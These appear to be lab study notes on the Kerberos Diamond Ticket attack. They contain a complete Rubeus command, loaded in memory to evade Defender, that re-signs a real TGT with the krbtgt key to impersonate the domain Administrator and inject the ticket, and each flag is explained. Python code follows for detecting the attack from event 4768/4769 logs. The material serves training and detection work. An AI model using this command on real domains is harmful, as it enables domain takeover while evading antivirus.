Diamond Ticket
A legitimate TGT that is modified and re-signed with the krbtgt AES256 key. Unlike a Golden Ticket, which is forged from scratch, a Diamond Ticket takes a real TGT and edits it to add privileged group memberships. Because the ticket originates from a legitimate Kerberos exchange, it is stealthier and harder to detect, and therefore more OpSec safe than a Golden Ticket.

Requirements:
- krbtgt AES256 key.
- A valid TGT (obtained via TGT delegation).
- Target username and Relative ID (RID) (typically 500 for Administrator).
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args "diamond /krbkey:[HASH_KRBTGT_AES256] /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt"
- Loader.exe: Runs Rubeus in memory (AV/Defender evasion).
- diamond: Modifies a legitimate TGT instead of forging one from scratch.
- /krbkey: AES256 hash of the krbtgt account, used to re-sign the modified TGT.
- /tgtdeleg: Automatically requests a delegable TGT from the current user session.
- /enctype:aes: Uses AES encryption instead of RC4 (more OpSec safe).
- /ticketuser: Username to impersonate in the forged ticket.
- /domain: Target domain.
- /dc: Domain Controller to send the request to.
- /ticketuserid: RID of the user to impersonate (500 = Administrator).
- /groups: Group memberships to include in the ticket (512 = Domain Admins).
- /createnetonly: Creates a sacrificial cmd.exe process with an isolated network identity (LUID).
- /show: Displays the newly created process window.
- /ptt: Injects the ticket directly into the current session (Pass-the-Ticket attack).
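A defender-side correlation, added here as an example and not part of the original note: the TGT that /tgtdeleg starts from was issued to (and logged, event 4768, for) the original user, while every service-ticket request made with the modified TGT is logged (event 4769) under the account name written into its PAC by /ticketuser, so a 4769 whose user never received a TGT from the same client address within the TGT lifetime is the anomaly to look for. The event records, the DC address and the lifetime below are constructed assumptions, and the heuristic deliberately ignores the encryption type because the command above uses AES.

```python
from collections import defaultdict
from datetime import datetime, timedelta

TGT_LIFETIME = timedelta(hours=10)   # assumed MaxTicketAge; tune to the domain's policy
DC_ADDRESSES = {"172.16.2.1"}        # constructed DC address; DC-originated 4769s are skipped

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

# Constructed sample Security-log events (only the fields the heuristic needs).
EVENTS = [
    {"EventID": 4768, "time": _ts("2024-05-01 08:00:00"), "TargetUserName": "studentx",
     "IpAddress": "172.16.100.10"},
    {"EventID": 4769, "time": _ts("2024-05-01 08:01:00"),
     "TargetUserName": "studentx@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "cifs/dcorp-dc.dollarcorp.moneycorp.local", "IpAddress": "172.16.100.10"},
    # Same client, but the TGT now names administrator: no 4768 was ever issued for it here.
    {"EventID": 4769, "time": _ts("2024-05-01 08:05:00"),
     "TargetUserName": "administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "cifs/dcorp-dc.dollarcorp.moneycorp.local", "IpAddress": "172.16.100.10"},
    # A normal administrator session from another host: 4768 precedes its 4769.
    {"EventID": 4768, "time": _ts("2024-05-01 07:30:00"), "TargetUserName": "administrator",
     "IpAddress": "172.16.100.20"},
    {"EventID": 4769, "time": _ts("2024-05-01 07:45:00"),
     "TargetUserName": "administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "ldap/dcorp-dc.dollarcorp.moneycorp.local", "IpAddress": "172.16.100.20"},
]

def _principal(name):
    """Normalise 'user@REALM' (4769 form) and 'user' (4768 form) to a lower-case user name."""
    return name.split("@", 1)[0].lower()

def find_tgs_without_tgt(events, lifetime=TGT_LIFETIME):
    """Return 4769 events whose (user, client IP) had no 4768 within `lifetime` before them."""
    tgt_times = defaultdict(list)   # (user, client ip) -> times a TGT was issued
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (_principal(ev["TargetUserName"]), ev["IpAddress"])
        if ev["EventID"] == 4768:
            tgt_times[key].append(ev["time"])
        elif ev["EventID"] == 4769 and ev["IpAddress"] not in DC_ADDRESSES:
            covered = any(timedelta(0) <= ev["time"] - t <= lifetime for t in tgt_times[key])
            if not covered:
                alerts.append({"time": ev["time"], "user": key[0], "client": key[1],
                               "service": ev["ServiceName"]})
    return alerts

if __name__ == "__main__":
    for a in find_tgs_without_tgt(EVENTS):
        print(f"{a['time']} TGS for {a['user']} from {a['client']} -> {a['service']}: no matching TGT request")
```

On real telemetry the correlation window must also cover TGTs issued before the search window and renewed or forwarded TGTs (which appear as 4769 with a krbtgt service name rather than as 4768), otherwise ordinary long-lived sessions will be flagged.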